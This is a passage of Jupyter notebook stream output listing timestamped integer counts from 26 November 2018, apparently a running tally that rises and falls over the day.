"['2018-11-26 07:57:42.220049', 11]\n",
"['2018-11-26 07:57:55.728725', 12]\n",
"['2018-11-26 07:58:06.840297', 13]\n",
"['2018-11-26 07:58:45.736102', 14]\n",
"['2018-11-26 07:59:24.533398', 15]\n",
"['2018-11-26 08:00:00.211268', 16]\n",
"['2018-11-26 08:00:01.236708', 17]\n",
"['2018-11-26 08:00:16.699897', 18]\n",
"['2018-11-26 08:02:00.708997', 17]\n",
"['2018-11-26 08:02:36.209999', 18]\n",
"['2018-11-26 08:02:52.698748', 19]\n",
"['2018-11-26 08:03:06.647548', 18]\n",
"['2018-11-26 08:03:35.167528', 17]\n",
"['2018-11-26 08:03:51.427099', 18]\n",
"['2018-11-26 08:03:58.764860', 19]\n",
"['2018-11-26 08:04:09.597979', 17]\n",
"['2018-11-26 08:04:23.939363', 15]\n",
"['2018-11-26 08:05:05.726429', 16]\n",
"['2018-11-26 08:05:11.916420', 15]\n",
"['2018-11-26 08:05:33.793051', 16]\n",
"['2018-11-26 08:05:43.282587', 17]\n",
"['2018-11-26 08:05:48.281595', 16]\n",
"['2018-11-26 08:06:26.192803', 17]\n",
"['2018-11-26 08:06:53.055779', 15]\n",
"['2018-11-26 08:07:57.290769', 11]\n",
"['2018-11-26 08:08:07.170315', 12]\n",
"['2018-11-26 08:08:31.196752', 11]\n",
"['2018-11-26 08:08:38.850439', 12]\n",
"['2018-11-26 08:08:43.082559', 13]\n",
"['2018-11-26 08:08:44.457609', 14]\n",
"['2018-11-26 08:09:13.872307', 15]\n",
"['2018-11-26 08:09:28.880132', 14]\n",
"['2018-11-26 08:09:38.901747', 13]\n",
"['2018-11-26 08:09:43.486682', 14]\n",
"['2018-11-26 08:09:56.734564', 15]\n",
"['2018-11-26 08:09:58.001035', 16]\n",
"['2018-11-26 08:10:11.604286', 17]\n",
"['2018-11-26 08:10:13.582102', 18]\n",
"['2018-11-26 08:10:19.766882', 17]\n",
"['2018-11-26 08:10:28.927074', 16]\n",
"['2018-11-26 08:10:54.249316', 17]\n",
"['2018-11-26 08:10:56.450886', 16]\n",
"['2018-11-26 08:10:57.380920', 17]\n",
"['2018-11-26 08:11:05.241480', 16]\n",
"['2018-11-26 08:11:29.945580', 17]\n",
"['2018-11-26 08:11:37.209514', 18]\n",
"['2018-11-26 08:12:20.229515', 19]\n",
"['2018-11-26 08:13:09.167485', 20]\n",
"['2018-11-26 08:13:21.176046', 19]\n",
"['2018-11-26 08:13:24.940785', 20]\n",
"['2018-11-26 08:13:28.585635', 21]\n",
"['2018-11-26 08:13:41.601194', 20]\n",
"['2018-11-26 08:13:57.861714', 19]\n",
"['2018-11-26 08:14:04.009664', 18]\n",
"['2018-11-26 08:14:09.285027', 19]\n",
"['2018-11-26 08:14:15.340654', 20]\n",
"['2018-11-26 08:14:30.487110', 19]\n",
"['2018-11-26 08:14:31.657982', 18]\n",
"['2018-11-26 08:14:38.469941', 19]\n",
"['2018-11-26 08:14:57.999796', 18]\n",
"['2018-11-26 08:15:03.102301', 17]\n",
"['2018-11-26 08:16:44.134977', 18]\n",
"['2018-11-26 08:16:47.641373', 17]\n",
"['2018-11-26 08:17:57.598378', 16]\n",
"['2018-11-26 08:18:15.605427', 15]\n",
"['2018-11-26 08:18:27.620939', 14]\n",
"['2018-11-26 08:18:39.657212', 13]\n",
"['2018-11-26 08:18:52.094898', 12]\n",
"['2018-11-26 08:19:10.451123', 13]\n",
"['2018-11-26 08:19:21.591617', 12]\n",
"['2018-11-26 08:19:51.765614', 13]\n",
"['2018-11-26 08:19:59.137548', 12]\n",
"['2018-11-26 08:20:12.483701', 11]\n",
"['2018-11-26 08:20:36.676120', 9]\n",
"['2018-11-26 08:22:09.001136', 10]\n",
"['2018-11-26 08:24:42.300182', 5]\n",
"['2018-11-26 08:26:42.377582', 2]\n",
"['2018-11-26 08:30:26.056521', 3]\n",
"['2018-11-26 08:33:06.283615', 4]\n",
"['2018-11-26 08:37:01.733436', 3]\n",
"['2018-11-26 08:37:46.750411', 2]\n",
"['2018-11-26 08:42:42.015757', 3]\n",
"['2018-11-26 08:42:43.366542', 4]\n",
"['2018-11-26 08:46:06.344004', 5]\n",
"['2018-11-26 08:47:06.349536', 3]\n",
"['2018-11-26 08:50:26.413510', 4]\n",
"['2018-11-26 08:51:08.218095', 5]\n",
"['2018-11-26 08:52:55.454808', 6]\n",
"['2018-11-26 08:53:10.222728', 7]\n",
"['2018-11-26 08:54:52.117500', 8]\n",
"['2018-11-26 08:55:07.422288', 7]\n",
"['2018-11-26 08:57:00.885998', 8]\n",
"['2018-11-26 08:57:37.481288', 7]\n",
"['2018-11-26 08:58:29.567248', 8]\n",
"['2018-11-26 08:58:52.791745', 9]\n",
"['2018-11-26 08:59:01.286668', 10]\n",
"['2018-11-26 08:59:09.255803', 11]\n",
"['2018-11-26 08:59:10.019036', 12]\n",
"['2018-11-26 08:59:28.756402', 13]\n",
"['2018-11-26 09:01:07.051643', 12]\n",
"['2018-11-26 09:01:17.668440', 13]\n",
"['2018-11-26 09:02:05.583763', 14]\n",
"['2018-11-26 09:03:17.877198', 13]\n",
"['2018-11-26 09:03:18.021878', 14]\n",
"['2018-11-26 09:03:58.200229', 13]\n",
"['2018-11-26 09:04:23.637475', 11]\n",
"['2018-11-26 09:04:56.576327', 12]\n",
"['2018-11-26 09:05:06.973928', 13]\n",
"['2018-11-26 09:05:50.854752', 14]\n",
"['2018-11-26 09:05:52.490034', 13]\n",
"['2018-11-26 09:06:41.269209', 14]\n",
"['2018-11-26 09:07:01.269221', 13]\n",
"['2018-11-26 09:07:15.461546', 12]\n",
"['2018-11-26 09:07:19.093497', 10]\n",
"['2018-11-26 09:07:44.305563', 11]\n",
"['2018-11-26 09:07:57.232923', 12]\n",
"['2018-11-26 09:09:02.796754', 13]\n",
"['2018-11-26 09:09:12.803902', 12]\n",
"['2018-11-26 09:09:24.749717', 13]\n",
"['2018-11-26 09:09:34.485683', 14]\n",
"['2018-11-26 09:09:52.422404', 15]\n",
"['2018-11-26 09:09:56.524790', 14]\n",
"['2018-11-26 09:09:56.760920', 15]\n",
"['2018-11-26 09:10:04.427208', 16]\n",
"['2018-11-26 09:10:07.123024', 17]\n",
"['2018-11-26 09:10:46.630083', 18]\n",
"['2018-11-26 09:11:01.013069', 19]\n",
"['2018-11-26 09:11:34.983987', 18]\n",
"['2018-11-26 09:11:56.758787', 17]\n",
"['2018-11-26 09:12:23.888909', 15]\n",
"['2018-11-26 09:12:25.694755', 16]\n",
"['2018-11-26 09:12:38.984294', 17]\n",
"['2018-11-26 09:12:39.828352', 18]\n",
"['2018-11-26 09:12:51.585213', 19]\n",
"['2018-11-26 09:12:53.901361', 20]\n",
"['2018-11-26 09:13:23.704021', 21]\n",
"['2018-11-26 09:13:25.944652', 22]\n",
"['2018-11-26 09:13:34.346759', 23]\n",
"['2018-11-26 09:13:52.942891', 22]\n",
"['2018-11-26 09:13:57.650310', 23]\n",
"['2018-11-26 09:14:09.091508', 22]\n",
"['2018-11-26 09:14:16.957519', 21]\n",
"['2018-11-26 09:14:23.177658', 22]\n",
"['2018-11-26 09:14:25.363135', 23]\n",
"['2018-11-26 09:14:34.405815', 24]\n",
"['2018-11-26 09:15:02.827374', 25]\n",
"['2018-11-26 09:15:07.075916', 24]\n",
"['2018-11-26 09:15:32.894915', 25]\n",
"['2018-11-26 09:16:36.270796', 26]\n",
"['2018-11-26 09:16:41.270761', 24]\n",
"['2018-11-26 09:16:55.911738', 23]\n",
"['2018-11-26 09:16:57.239258', 22]\n",
"['2018-11-26 09:17:21.619257', 23]\n",
"['2018-11-26 09:17:38.527136', 24]\n",
"['2018-11-26 09:17:39.951506', 25]\n",
"['2018-11-26 09:17:54.971123', 24]\n",
"['2018-11-26 09:18:25.330263', 23]\n",
"['2018-11-26 09:18:36.756762', 22]\n",
"['2018-11-26 09:18:43.452455', 23]\n",
"['2018-11-26 09:18:50.756029', 22]\n",
"['2018-11-26 09:18:52.613147', 23]\n",
"['2018-11-26 09:18:58.478704', 22]\n",
"['2018-11-26 09:19:04.889452', 20]\n",
"['2018-11-26 09:19:06.245340', 21]\n",
"['2018-11-26 09:19:10.650333', 20]\n",
"['2018-11-26 09:19:11.099577', 21]\n",
"['2018-11-26 09:19:35.753707', 19]\n",
"['2018-11-26 09:19:40.169801', 18]\n",
"['2018-11-26 09:20:28.540980', 17]\n",
"['2018-11-26 09:20:53.629212', 18]\n",
"['2018-11-26 09:21:12.420025', 17]\n",
"['2018-11-26 09:21:24.888893', 16]\n",
"['2018-11-26 09:21:31.025202', 17]\n",
"['2018-11-26 09:21:52.482003', 16]\n",
"['2018-11-26 09:21:56.284024', 17]\n",
"['2018-11-26 09:22:11.312650', 16]\n",
"['2018-11-26 09:22:59.535604', 14]\n",
"['2018-11-26 09:23:11.611520', 15]\n",
"['2018-11-26 09:23:51.191674', 14]\n",
"['2018-11-26 09:24:37.653814', 13]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 09:24:56.017597', 12]\n",
"['2018-11-26 09:25:55.854763', 10]\n",
"['2018-11-26 09:26:03.746484', 11]\n",
"['2018-11-26 09:26:18.030994', 10]\n",
"['2018-11-26 09:27:11.195634', 9]\n",
"['2018-11-26 09:27:26.140121', 7]\n",
"['2018-11-26 09:27:56.255568', 8]\n",
"['2018-11-26 09:28:11.179828', 7]\n",
"['2018-11-26 09:34:13.043992', 2]\n",
"['2018-11-26 09:36:27.515461', 3]\n",
"['2018-11-26 09:41:03.175602', 4]\n",
"['2018-11-26 09:41:07.593039', 3]\n",
"['2018-11-26 09:43:35.479960', 4]\n",
"['2018-11-26 09:45:49.952341', 5]\n",
"['2018-11-26 09:49:08.845046', 4]\n",
"['2018-11-26 09:49:53.167036', 3]\n",
"['2018-11-26 09:52:46.584337', 4]\n",
"['2018-11-26 09:56:34.744860', 5]\n",
"['2018-11-26 09:56:56.179781', 4]\n",
"['2018-11-26 09:56:57.964284', 5]\n",
"['2018-11-26 09:57:11.601980', 6]\n",
"['2018-11-26 09:57:35.252003', 5]\n",
"['2018-11-26 09:57:41.110206', 6]\n",
"['2018-11-26 09:57:45.931118', 7]\n",
"['2018-11-26 09:57:57.060627', 8]\n",
"['2018-11-26 09:58:01.337671', 9]\n",
"['2018-11-26 09:58:23.748114', 10]\n",
"['2018-11-26 09:59:10.214585', 11]\n",
"['2018-11-26 09:59:25.782318', 12]\n",
"['2018-11-26 10:00:52.567499', 13]\n",
"['2018-11-26 10:01:39.429098', 14]\n",
"['2018-11-26 10:01:41.900181', 13]\n",
"['2018-11-26 10:01:46.273106', 14]\n",
"['2018-11-26 10:02:02.122913', 12]\n",
"['2018-11-26 10:02:11.280980', 11]\n",
"['2018-11-26 10:02:34.963648', 10]\n",
"['2018-11-26 10:02:43.213468', 11]\n",
"['2018-11-26 10:03:10.268822', 12]\n",
"['2018-11-26 10:03:58.362187', 10]\n",
"['2018-11-26 10:04:11.999392', 11]\n",
"['2018-11-26 10:04:28.470517', 10]\n",
"['2018-11-26 10:04:39.598024', 11]\n",
"['2018-11-26 10:04:54.599703', 10]\n",
"['2018-11-26 10:05:26.134203', 11]\n",
"['2018-11-26 10:05:29.616037', 12]\n",
"['2018-11-26 10:05:29.990785', 13]\n",
"['2018-11-26 10:05:32.208917', 14]\n",
"['2018-11-26 10:05:37.811330', 15]\n",
"['2018-11-26 10:05:38.525458', 16]\n",
"['2018-11-26 10:05:46.196237', 14]\n",
"['2018-11-26 10:05:46.874278', 15]\n",
"['2018-11-26 10:05:56.225114', 16]\n",
"['2018-11-26 10:05:56.764080', 17]\n",
"['2018-11-26 10:06:04.434264', 18]\n",
"['2018-11-26 10:06:10.461457', 19]\n",
"['2018-11-26 10:06:25.211599', 20]\n",
"['2018-11-26 10:06:33.618855', 21]\n",
"['2018-11-26 10:06:47.605174', 19]\n",
"['2018-11-26 10:07:10.468462', 18]\n",
"['2018-11-26 10:07:10.971579', 19]\n",
"['2018-11-26 10:07:24.841566', 20]\n",
"['2018-11-26 10:08:06.966458', 21]\n",
"['2018-11-26 10:08:38.643320', 20]\n",
"['2018-11-26 10:09:20.760187', 21]\n",
"['2018-11-26 10:09:26.613188', 22]\n",
"['2018-11-26 10:09:30.799976', 21]\n",
"['2018-11-26 10:09:39.870117', 20]\n",
"['2018-11-26 10:10:03.933920', 19]\n",
"['2018-11-26 10:10:14.849284', 20]\n",
"['2018-11-26 10:11:17.653957', 21]\n",
"['2018-11-26 10:11:25.452292', 22]\n",
"['2018-11-26 10:11:47.151263', 23]\n",
"['2018-11-26 10:11:59.447156', 24]\n",
"['2018-11-26 10:12:09.669354', 25]\n",
"['2018-11-26 10:13:04.980667', 24]\n",
"['2018-11-26 10:13:45.766367', 23]\n",
"['2018-11-26 10:14:16.767393', 22]\n",
"['2018-11-26 10:14:46.069696', 23]\n",
"['2018-11-26 10:14:57.525069', 22]\n",
"['2018-11-26 10:15:05.943668', 21]\n",
"['2018-11-26 10:15:31.680343', 22]\n",
"['2018-11-26 10:15:48.125814', 21]\n",
"['2018-11-26 10:15:50.528874', 20]\n",
"['2018-11-26 10:15:52.269754', 19]\n",
"['2018-11-26 10:16:07.782626', 18]\n",
"['2018-11-26 10:16:18.633868', 16]\n",
"['2018-11-26 10:16:20.715676', 15]\n",
"['2018-11-26 10:16:28.870890', 14]\n",
"['2018-11-26 10:16:41.103711', 13]\n",
"['2018-11-26 10:16:47.292183', 12]\n",
"['2018-11-26 10:16:48.862422', 13]\n",
"['2018-11-26 10:17:04.816915', 14]\n",
"['2018-11-26 10:17:30.923207', 15]\n",
"['2018-11-26 10:17:32.882017', 16]\n",
"['2018-11-26 10:17:53.789935', 15]\n",
"['2018-11-26 10:18:00.254811', 16]\n",
"['2018-11-26 10:18:06.691409', 17]\n",
"['2018-11-26 10:18:44.519945', 18]\n",
"['2018-11-26 10:18:52.550373', 19]\n",
"['2018-11-26 10:19:41.461026', 20]\n",
"['2018-11-26 10:19:45.107583', 21]\n",
"['2018-11-26 10:20:10.304369', 22]\n",
"['2018-11-26 10:20:56.696360', 21]\n",
"['2018-11-26 10:21:30.176043', 22]\n",
"['2018-11-26 10:21:45.370731', 21]\n",
"['2018-11-26 10:21:55.565415', 20]\n",
"['2018-11-26 10:22:30.210637', 19]\n",
"['2018-11-26 10:22:37.720481', 20]\n",
"['2018-11-26 10:23:15.692926', 21]\n",
"['2018-11-26 10:23:16.816652', 22]\n",
"['2018-11-26 10:23:43.699532', 21]\n",
"['2018-11-26 10:24:00.331184', 20]\n",
"['2018-11-26 10:24:09.857789', 19]\n",
"['2018-11-26 10:24:10.327761', 18]\n",
"['2018-11-26 13:59:42.927132', 2]\n",
"['2018-11-26 13:59:44.663165', 3]\n",
"['2018-11-26 13:59:46.407447', 4]\n",
"['2018-11-26 13:59:47.309516', 5]\n",
"['2018-11-26 13:59:47.801068', 6]\n",
"['2018-11-26 13:59:54.876579', 7]\n",
"['2018-11-26 13:59:58.584335', 8]\n",
"['2018-11-26 14:00:04.248054', 9]\n",
"['2018-11-26 14:00:05.945847', 10]\n",
"['2018-11-26 14:00:06.584415', 11]\n",
"['2018-11-26 14:00:13.885002', 12]\n",
"['2018-11-26 14:00:21.266902', 13]\n",
"['2018-11-26 14:00:24.125573', 14]\n",
"['2018-11-26 14:00:35.075912', 15]\n",
"['2018-11-26 14:00:38.060425', 16]\n",
"['2018-11-26 14:00:41.994123', 17]\n",
"['2018-11-26 14:00:44.071474', 18]\n",
"['2018-11-26 14:00:54.335067', 19]\n",
"['2018-11-26 14:00:58.891057', 20]\n",
"['2018-11-26 14:01:01.922021', 21]\n",
"['2018-11-26 14:01:03.318096', 22]\n",
"['2018-11-26 14:01:04.353068', 23]\n",
"['2018-11-26 14:01:10.509776', 24]\n",
"['2018-11-26 14:01:19.344628', 25]\n",
"['2018-11-26 14:01:30.227866', 26]\n",
"['2018-11-26 14:01:36.338108', 27]\n",
"['2018-11-26 14:01:45.814211', 28]\n",
"['2018-11-26 14:01:47.925093', 29]\n",
"['2018-11-26 14:01:57.551248', 30]\n",
"['2018-11-26 14:02:04.325489', 31]\n",
"['2018-11-26 14:02:23.023428', 32]\n",
"['2018-11-26 14:02:37.749091', 33]\n",
"['2018-11-26 14:02:50.744633', 34]\n",
"['2018-11-26 14:03:01.188825', 35]\n",
"['2018-11-26 14:03:04.888274', 36]\n",
"['2018-11-26 14:03:47.823634', 35]\n",
"['2018-11-26 14:04:00.581639', 36]\n",
"['2018-11-26 14:04:14.223496', 37]\n",
"['2018-11-26 14:04:23.833665', 38]\n",
"['2018-11-26 14:04:24.711456', 39]\n",
"['2018-11-26 14:04:26.285695', 40]\n",
"['2018-11-26 14:04:36.993577', 39]\n",
"['2018-11-26 14:05:07.277752', 38]\n",
"['2018-11-26 14:05:11.188464', 36]\n",
"['2018-11-26 14:05:17.445211', 35]\n",
"['2018-11-26 14:05:39.065402', 36]\n",
"['2018-11-26 14:06:34.315872', 37]\n",
"['2018-11-26 14:06:36.026326', 38]\n",
"['2018-11-26 14:06:37.954806', 37]\n",
"['2018-11-26 14:06:47.808983', 36]\n",
"['2018-11-26 14:07:01.710962', 33]\n",
"['2018-11-26 14:07:09.565836', 34]\n",
"['2018-11-26 14:07:24.350944', 33]\n",
"['2018-11-26 14:07:38.821492', 34]\n",
"['2018-11-26 14:08:01.272657', 35]\n",
"['2018-11-26 14:08:06.256425', 34]\n",
"['2018-11-26 14:08:06.866555', 35]\n",
"['2018-11-26 14:08:09.029710', 34]\n",
"['2018-11-26 14:08:17.375831', 33]\n",
"['2018-11-26 14:08:25.016233', 32]\n",
"['2018-11-26 14:08:50.383309', 33]\n",
"['2018-11-26 14:09:00.548176', 34]\n",
"['2018-11-26 14:09:24.807739', 33]\n",
"['2018-11-26 14:09:39.172457', 32]\n",
"['2018-11-26 14:09:42.056626', 31]\n",
"['2018-11-26 14:09:50.429913', 32]\n",
"['2018-11-26 14:09:51.324450', 33]\n",
"['2018-11-26 14:09:53.636343', 32]\n",
"['2018-11-26 14:10:05.220564', 33]\n",
"['2018-11-26 14:10:08.147960', 34]\n",
"['2018-11-26 14:10:44.019397', 35]\n",
"['2018-11-26 14:11:01.847114', 36]\n",
"['2018-11-26 14:11:05.324657', 35]\n",
"['2018-11-26 14:11:08.496802', 36]\n",
"['2018-11-26 14:11:09.549208', 37]\n",
"['2018-11-26 14:11:25.614801', 36]\n",
"['2018-11-26 14:11:46.797600', 37]\n",
"['2018-11-26 14:11:57.805994', 36]\n",
"['2018-11-26 14:12:03.088626', 37]\n",
"['2018-11-26 14:12:09.374565', 38]\n",
"['2018-11-26 14:12:17.777121', 37]\n",
"['2018-11-26 14:12:36.146617', 38]\n",
"['2018-11-26 14:12:44.674338', 37]\n",
"['2018-11-26 14:13:22.444612', 35]\n",
"['2018-11-26 14:13:22.898986', 36]\n",
"['2018-11-26 14:13:34.373267', 35]\n",
"['2018-11-26 14:13:37.107734', 36]\n",
"['2018-11-26 14:13:50.879929', 35]\n",
"['2018-11-26 14:13:59.604933', 34]\n",
"['2018-11-26 14:14:11.045907', 33]\n",
"['2018-11-26 14:14:14.130538', 32]\n",
"['2018-11-26 14:14:16.278506', 31]\n",
"['2018-11-26 14:14:21.407466', 29]\n",
"['2018-11-26 14:14:45.655572', 28]\n",
"['2018-11-26 14:14:53.223768', 29]\n",
"['2018-11-26 14:15:03.590154', 30]\n",
"['2018-11-26 14:15:35.618445', 29]\n",
"['2018-11-26 14:15:54.953661', 28]\n",
"['2018-11-26 14:16:01.288376', 29]\n",
"['2018-11-26 14:16:04.820671', 28]\n",
"['2018-11-26 14:16:23.949036', 29]\n",
"['2018-11-26 14:16:25.165958', 30]\n",
"['2018-11-26 14:16:54.148095', 29]\n",
"['2018-11-26 14:17:40.182503', 28]\n",
"['2018-11-26 14:18:10.521298', 24]\n",
"['2018-11-26 14:18:19.020137', 23]\n",
"['2018-11-26 14:18:30.979772', 22]\n",
"['2018-11-26 14:18:58.722959', 19]\n",
"['2018-11-26 14:19:02.820831', 18]\n",
"['2018-11-26 14:19:06.735760', 17]\n",
"['2018-11-26 14:19:07.656671', 18]\n",
"['2018-11-26 14:19:28.267040', 17]\n",
"['2018-11-26 14:20:03.901524', 16]\n",
"['2018-11-26 14:20:33.917825', 10]\n",
"['2018-11-26 14:21:56.091777', 11]\n",
"['2018-11-26 14:21:56.286893', 12]\n",
"['2018-11-26 14:22:22.935486', 11]\n",
"['2018-11-26 14:22:35.824589', 12]\n",
"['2018-11-26 14:22:42.705799', 13]\n",
"['2018-11-26 14:22:54.083558', 12]\n",
"['2018-11-26 14:23:21.729154', 13]\n",
"['2018-11-26 14:23:24.586859', 14]\n",
"['2018-11-26 14:23:31.016188', 13]\n",
"['2018-11-26 14:24:01.749977', 11]\n",
"['2018-11-26 14:24:45.185573', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 14:24:45.579645', 13]\n",
"['2018-11-26 14:25:09.847619', 12]\n",
"['2018-11-26 14:25:11.718363', 13]\n",
"['2018-11-26 14:26:11.725751', 12]\n",
"['2018-11-26 14:26:43.212836', 11]\n",
"['2018-11-26 14:27:09.389022', 10]\n",
"['2018-11-26 14:27:44.186779', 8]\n",
"['2018-11-26 14:28:15.552741', 7]\n",
"['2018-11-26 14:28:45.205604', 5]\n",
"['2018-11-26 14:31:16.188229', 3]\n",
"['2018-11-26 14:32:41.217158', 4]\n",
"['2018-11-26 14:37:45.243855', 2]\n",
"['2018-11-26 14:38:37.013760', 3]\n",
"['2018-11-26 14:39:43.991638', 4]\n",
"['2018-11-26 14:43:48.102376', 3]\n",
"['2018-11-26 14:43:48.850570', 4]\n",
"['2018-11-26 14:44:46.496726', 5]\n",
"['2018-11-26 14:46:49.260513', 4]\n",
"['2018-11-26 14:47:50.298603', 3]\n",
"['2018-11-26 14:48:23.598472', 4]\n",
"['2018-11-26 14:48:52.469358', 3]\n",
"['2018-11-26 14:53:53.225228', 4]\n",
"['2018-11-26 14:56:10.348519', 5]\n",
"['2018-11-26 14:56:35.854159', 6]\n",
"['2018-11-26 14:57:11.724950', 7]\n",
"['2018-11-26 14:58:00.610527', 8]\n",
"['2018-11-26 14:58:17.110742', 9]\n",
"['2018-11-26 14:59:01.756826', 10]\n",
"['2018-11-26 14:59:16.796583', 11]\n",
"['2018-11-26 14:59:49.968765', 12]\n",
"['2018-11-26 15:00:24.130448', 13]\n",
"['2018-11-26 15:00:27.099075', 14]\n",
"['2018-11-26 15:00:52.389657', 15]\n",
"['2018-11-26 15:01:12.156750', 14]\n",
"['2018-11-26 15:01:13.329208', 13]\n",
"['2018-11-26 15:01:42.990316', 12]\n",
"['2018-11-26 15:02:14.089088', 11]\n",
"['2018-11-26 15:02:23.653807', 10]\n",
"['2018-11-26 15:02:30.220393', 11]\n",
"['2018-11-26 15:02:51.380454', 12]\n",
"['2018-11-26 15:02:58.863363', 13]\n",
"['2018-11-26 15:03:01.465851', 14]\n",
"['2018-11-26 15:03:07.524119', 12]\n",
"['2018-11-26 15:03:17.696217', 11]\n",
"['2018-11-26 15:04:00.264609', 12]\n",
"['2018-11-26 15:04:22.270772', 11]\n",
"['2018-11-26 15:04:23.659948', 12]\n",
"['2018-11-26 15:05:15.019333', 11]\n",
"['2018-11-26 15:06:37.209571', 10]\n",
"['2018-11-26 15:06:38.431155', 11]\n",
"['2018-11-26 15:06:40.683774', 12]\n",
"['2018-11-26 15:06:51.528774', 11]\n",
"['2018-11-26 15:06:54.777294', 12]\n",
"['2018-11-26 15:07:00.662602', 11]\n",
"['2018-11-26 15:07:04.671993', 12]\n",
"['2018-11-26 15:07:08.894714', 13]\n",
"['2018-11-26 15:07:18.390355', 14]\n",
"['2018-11-26 15:07:33.008187', 15]\n",
"['2018-11-26 15:08:42.508107', 16]\n",
"['2018-11-26 15:10:08.653837', 12]\n",
"['2018-11-26 15:10:38.707226', 11]\n",
"['2018-11-26 15:10:41.411793', 12]\n",
"['2018-11-26 15:10:47.742597', 13]\n",
"['2018-11-26 15:10:52.930362', 14]\n",
"['2018-11-26 15:10:56.139328', 13]\n",
"['2018-11-26 15:11:05.147465', 12]\n",
"['2018-11-26 15:11:09.342958', 10]\n",
"['2018-11-26 15:11:21.946337', 8]\n",
"['2018-11-26 15:11:32.944715', 9]\n",
"['2018-11-26 15:11:38.884565', 8]\n",
"['2018-11-26 15:12:25.022736', 9]\n",
"['2018-11-26 15:12:42.666916', 10]\n",
"['2018-11-26 15:13:35.797170', 11]\n",
"['2018-11-26 15:13:52.372686', 12]\n",
"['2018-11-26 15:14:40.148605', 13]\n",
"['2018-11-26 15:14:42.071151', 12]\n",
"['2018-11-26 15:15:02.802861', 11]\n",
"['2018-11-26 15:15:42.595319', 9]\n",
"['2018-11-26 15:16:44.582390', 8]\n",
"['2018-11-26 15:16:50.738046', 9]\n",
"['2018-11-26 15:17:34.311822', 10]\n",
"['2018-11-26 15:17:35.612886', 11]\n",
"['2018-11-26 15:17:39.358754', 10]\n",
"['2018-11-26 15:18:17.486481', 9]\n",
"['2018-11-26 15:18:48.564616', 8]\n",
"['2018-11-26 15:20:50.084298', 9]\n",
"['2018-11-26 15:20:57.154215', 8]\n",
"['2018-11-26 15:20:58.006530', 9]\n",
"['2018-11-26 15:21:34.814259', 7]\n",
"['2018-11-26 15:22:04.663610', 5]\n",
"['2018-11-26 15:24:11.223928', 6]\n",
"['2018-11-26 15:32:00.268587', 2]\n",
"['2018-11-26 15:34:10.201603', 3]\n",
"['2018-11-26 15:36:11.530052', 2]\n",
"['2018-11-26 15:41:01.536860', 3]\n",
"['2018-11-26 15:41:01.671462', 4]\n",
"['2018-11-26 15:41:11.226868', 5]\n",
"['2018-11-26 15:41:23.305739', 6]\n",
"['2018-11-26 15:45:14.297618', 5]\n",
"['2018-11-26 15:45:40.988894', 6]\n",
"['2018-11-26 15:48:54.068193', 7]\n",
"['2018-11-26 15:48:55.533562', 8]\n",
"['2018-11-26 15:49:21.320957', 7]\n",
"['2018-11-26 15:49:55.549174', 6]\n",
"['2018-11-26 15:50:11.699498', 7]\n",
"['2018-11-26 15:50:36.343864', 8]\n",
"['2018-11-26 15:51:31.315547', 9]\n",
"['2018-11-26 15:51:31.375173', 10]\n",
"['2018-11-26 15:51:33.912755', 11]\n",
"['2018-11-26 15:51:35.489802', 12]\n",
"['2018-11-26 15:52:01.802875', 13]\n",
"['2018-11-26 15:52:16.676826', 14]\n",
"['2018-11-26 15:52:30.417634', 15]\n",
"['2018-11-26 15:52:31.537226', 16]\n",
"['2018-11-26 15:52:33.628487', 17]\n",
"['2018-11-26 15:52:37.224490', 18]\n",
"['2018-11-26 15:52:37.274189', 19]\n",
"['2018-11-26 15:52:37.626899', 20]\n",
"['2018-11-26 15:53:09.903242', 21]\n",
"['2018-11-26 15:53:22.962972', 22]\n",
"['2018-11-26 15:53:34.452239', 23]\n",
"['2018-11-26 15:53:43.110138', 24]\n",
"['2018-11-26 15:53:55.658321', 25]\n",
"['2018-11-26 15:54:15.829249', 24]\n",
"['2018-11-26 15:54:32.213474', 25]\n",
"['2018-11-26 15:55:04.477067', 26]\n",
"['2018-11-26 15:55:19.538835', 27]\n",
"['2018-11-26 15:55:23.516597', 26]\n",
"['2018-11-26 15:55:41.940590', 24]\n",
"['2018-11-26 15:56:17.726197', 23]\n",
"['2018-11-26 15:56:32.026676', 22]\n",
"['2018-11-26 15:56:37.951301', 20]\n",
"['2018-11-26 15:57:10.086970', 19]\n",
"['2018-11-26 15:57:26.036610', 16]\n",
"['2018-11-26 15:57:28.461900', 17]\n",
"['2018-11-26 15:57:31.870333', 16]\n",
"['2018-11-26 15:57:40.458539', 15]\n",
"['2018-11-26 15:58:27.315384', 16]\n",
"['2018-11-26 15:58:31.514805', 17]\n",
"['2018-11-26 15:58:37.399833', 16]\n",
"['2018-11-26 15:58:52.190750', 17]\n",
"['2018-11-26 15:58:54.525480', 18]\n",
"['2018-11-26 15:58:55.392792', 19]\n",
"['2018-11-26 15:59:06.555820', 20]\n",
"['2018-11-26 15:59:11.099157', 21]\n",
"['2018-11-26 15:59:30.585369', 19]\n",
"['2018-11-26 15:59:44.212436', 18]\n",
"['2018-11-26 15:59:54.743803', 17]\n",
"['2018-11-26 15:59:59.848323', 18]\n",
"['2018-11-26 16:00:00.567511', 19]\n",
"['2018-11-26 16:00:01.332203', 20]\n",
"['2018-11-26 16:00:15.500901', 21]\n",
"['2018-11-26 16:00:48.998547', 20]\n",
"['2018-11-26 16:01:02.566401', 21]\n",
"['2018-11-26 16:01:08.512173', 22]\n",
"['2018-11-26 16:01:13.255837', 23]\n",
"['2018-11-26 16:01:23.650465', 24]\n",
"['2018-11-26 16:01:29.304005', 22]\n",
"['2018-11-26 16:01:31.493402', 23]\n",
"['2018-11-26 16:02:02.160099', 21]\n",
"['2018-11-26 16:02:34.012362', 20]\n",
"['2018-11-26 16:02:42.014306', 19]\n",
"['2018-11-26 16:02:50.041299', 20]\n",
"['2018-11-26 16:03:19.964970', 19]\n",
"['2018-11-26 16:03:54.769567', 17]\n",
"['2018-11-26 16:04:14.118641', 15]\n",
"['2018-11-26 16:04:21.497667', 16]\n",
"['2018-11-26 16:04:49.679590', 17]\n",
"['2018-11-26 16:04:55.913759', 16]\n",
"['2018-11-26 16:05:08.519740', 13]\n",
"['2018-11-26 16:05:29.913280', 11]\n",
"['2018-11-26 16:05:32.540289', 10]\n",
"['2018-11-26 16:05:49.845040', 11]\n",
"['2018-11-26 16:06:25.114344', 12]\n",
"['2018-11-26 16:06:30.090463', 13]\n",
"['2018-11-26 16:06:54.806214', 12]\n",
"['2018-11-26 16:07:10.448897', 11]\n",
"['2018-11-26 16:08:02.598669', 12]\n",
